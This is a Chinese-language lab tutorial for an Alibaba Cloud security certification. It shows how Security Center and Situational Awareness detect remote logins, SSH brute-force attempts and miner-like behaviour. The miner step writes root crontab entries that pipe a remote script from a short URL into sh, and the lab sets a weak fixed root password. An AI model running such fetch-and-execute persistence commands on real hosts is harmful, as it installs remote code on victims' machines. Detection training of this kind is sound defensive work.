阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验

本文涉及的产品
云服务器 ECS,每月免费额度200元 3个月
云服务器ECS,u1 2核4GB 1个月
云安全中心 免费版,不限时长
简介: 阿里云安全ACP认证考试实验之云盾之云安全中心与态势感知入门体验

1、实验概述

通过本实验可对云安全中心,态势感知的一些基本操作有深入了解以及如何来对实例进行安全监控

2、实验目标

完成此实验可以掌握的能力有:

在安骑士中添加白名单、登录安全设置

通过态势感知查看实例的相关告警威胁

3、学前建议:

了解安骑士、态势感知控制台


第 1 章:实验背景


1.1 背景知识


安骑士是阿里云云盾推出的一款轻量级主机服务,支持阿里云和非阿里云服务器。通过采集用户主机资产和运行状态、脆弱性和安全告警数据,提供主机威胁检测和自动防御的能力。

态势感知是阿里云云盾下的云上安全监控和诊断服务,面向云上资产提供安全事件检测、漏洞扫描、基线配置核查等服务。态势感知结合了阿里自主研发的大数据和机器学习算法,通过多引擎查杀帮助实时全面了解和有效处理服务器的安全隐患,并实现对云上资产的集中安全管理 。


第 2 章:实验详述


2.1 实验资源


在弹出的左侧栏中,点击 创建资源 按钮,开始创建实验资源。

资源创建过程需要1-3分钟。完成实验资源的创建后,用户可以通过 实验资源 查看实验中所需的资源信息,例如:阿里云账号等。


2.2 实验步骤


通过沙箱申请资源成功后,在本地保存下阿里云账号信息,包括企业别名、子用户名称、子用户密码、AK ID 和AK Secret。点击前往控制台按钮

20200709132312213.jpg

进入登录页面,输入申请资源处提供的账号,@前为子用户名称,@后为企业别名

20200709132351402.jpg

复制用户密码

20200709132411175.jpg

点击登录

一、创建黑客ECS

1.在与沙箱生成的目标ECS的另一个地域,创建一台黑客ECS

点击云服务器ECS


20200709132438545.jpg


此处可以看到,我们的目标站点在华东二


20200709132458197.jpg

点击下图的创建实例

20200709132518442.jpg

202007091325362.jpg


镜像选择centos 6.8即可

20200709132556490.png

2.网络选择默认vpc即可


20200709132617762.png


3.管理员root 密码设定为1234@abcd,实例名可以为hack


20200709132637794.png

4.点击确认订单


勾选服务条款,并点击创建实例


5.创建成功


二、将本地IP加入白名单以防被拉黑


1.查询本地IP。通过浏览器打开 www.ip138.com 来查询本地IP

20200709132716740.png

2.在产品服务中找到安骑士


20200709132735436.png


3.在安骑士找到设置,安全配置,点击登录ip拦截加白(点此设置)

20200709132754853.png


4.点击添加

20200709132816520.png

5.将刚刚找到的本地ip复制到源IP中,将目标主机添加到其中,点击确定白名单增加完成。(如果没有列出目标服务器的IP,对象类型选择择:弹性公网EIP)


20200709132835308.png三、利用不同地域的黑客ECS远程登录监控目标


1.在安骑士入侵检测,异常登录中,查看异地登录,目前没有记录


20200709132854999.png


2.点击登录安全设置

20200709132913542.png

3.点击添加,选择常用登录地,资产勾选目标ECS,并点击确定

2020070913293466.png


4.利用本地远程登录目标ECS


可通过安骑士资产列表查看目标ecs IP地址

20200709132952440.png


Mac版直接通过终端登录,windows版请参考云中沙箱 帮助文档

20200709133011935.png

5.刷新可以看到没有告警提示

20200709133029710.png


6.重复上述登录步骤,登录hack服务器,并远程连接目标ECS


20200709133046607.png

7.再次刷新,可看到异地登录告警记录

2020070913310335.png


四、利用黑客ECS通过SSH登录监控目标ECS(密码故意打错模拟爆破)


1.本地ssh登录黑客ECS

20200709133121828.png


2.通过黑客ECS ssh 登录目标ECS,故意打错密码(多操作几次,3-6次),态势感知会判断为暴破。


20200709133140249.png


五、通过态势感知进行查看威胁

1.在产品服务->安全->态势感知 打开态势感知控制台


20200709133158125.png



2.可以看到有一个安全告警,是之前异地登录的告警


20200709133217303.png

3.点击攻击分析,可查看攻击分析的异常。(模拟暴力破解的异常6个小时内才会同步到攻击分析)

20200709133235780.png


4.点击安全大屏,也可查看安全威胁。

2020070913325433.png


六、模拟矿机异常行为

在目标主机输入命令,模拟矿机行为

echo "/5 * curl -sL https://1.co/6n11111PMR | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "/5 * curl -sL https://1.co/6n1111P1MR | sh" > /var/spool/cron/crontabs/root
crontab –l

20200709133330441.png

过几分钟,在态势感知的 安全告警处理 中,可查看到 进程异常行为。

20200709133348562.png

目录
相关文章
|
29天前
|
关系型数据库 分布式数据库 数据库
成都晨云信息技术完成阿里云PolarDB数据库产品生态集成认证
近日,成都晨云信息技术有限责任公司(以下简称晨云信息)与阿里云PolarDB PostgreSQL版数据库产品展开产品集成认证。测试结果表明,晨云信息旗下晨云-站群管理系统(V1.0)与阿里云以下产品:开源云原生数据库PolarDB PostgreSQL版(V11),完全满足产品兼容认证要求,兼容性良好,系统运行稳定。
|
1天前
|
存储 SQL 缓存
阿里云大学考试python中级题目及解析-python中级
阿里云大学考试python中级题目及解析-python中级
|
1月前
|
弹性计算 网络协议 关系型数据库
网络技术基础阿里云实验——企业级云上网络构建实践
实验地址:<https://developer.aliyun.com/adc/scenario/65e54c7876324bbe9e1fb18665719179> 本文档指导在阿里云上构建跨地域的网络环境,涉及杭州和北京两个地域。任务包括创建VPC、交换机、ECS实例,配置VPC对等连接,以及设置安全组和网络ACL规则以实现特定服务间的互访。例如,允许北京的研发服务器ECS-DEV访问杭州的文件服务器ECS-FS的SSH服务,ECS-FS访问ECS-WEB01的SSH服务,ECS-WEB01访问ECS-DB01的MySQL服务,并确保ECS-WEB03对外提供HTTP服务。
|
2月前
|
云安全 运维 安全
带你读《从基础到应用云上安全航行指南》——云安全专家教你如何实现一体化、自动化的云安全审计,运营闭环(1)
带你读《从基础到应用云上安全航行指南》——云安全专家教你如何实现一体化、自动化的云安全审计,运营闭环(1)
140 1
|
2月前
|
云安全 安全 网络安全
带你读《从基础到应用云上安全航行指南》——云安全专家教你如何实现一体化、自动化的云安全审计,运营闭环(2)
带你读《从基础到应用云上安全航行指南》——云安全专家教你如何实现一体化、自动化的云安全审计,运营闭环(2)
108 0
|
2月前
|
云安全 SQL 弹性计算
带你读《从基础到应用云上安全航行指南》——云安全专家教你如何实现一体化、自动化的云安全审计,运营闭环(3)
带你读《从基础到应用云上安全航行指南》——云安全专家教你如何实现一体化、自动化的云安全审计,运营闭环(3)
145 0
|
2月前
|
云安全 架构师 安全
阿里云云计算架构师ACE认证(Alibaba Cloud Certified Expert - Cloud Architect)考试大纲
介绍阿里云云计算架构师ACE认证(Alibaba Cloud Certified Expert - Cloud Architect)所需具备的知识及学习方法等。
622 2
|
2月前
|
消息中间件 监控 Cloud Native
阿里云云原生微服务高级工程师认证(ACP级-Alibaba Cloud Certification Professional)考试大纲
介绍阿里云云原生微服务高级工程师认证(ACP级-Alibaba Cloud Certification Professional)所需具备的知识及学习方法等。
276 0
|
4月前
|
安全 网络安全 数据处理
云安全中心和传统安全产品有什么不同
云安全中心和传统安全产品有什么不同
136 2

热门文章

最新文章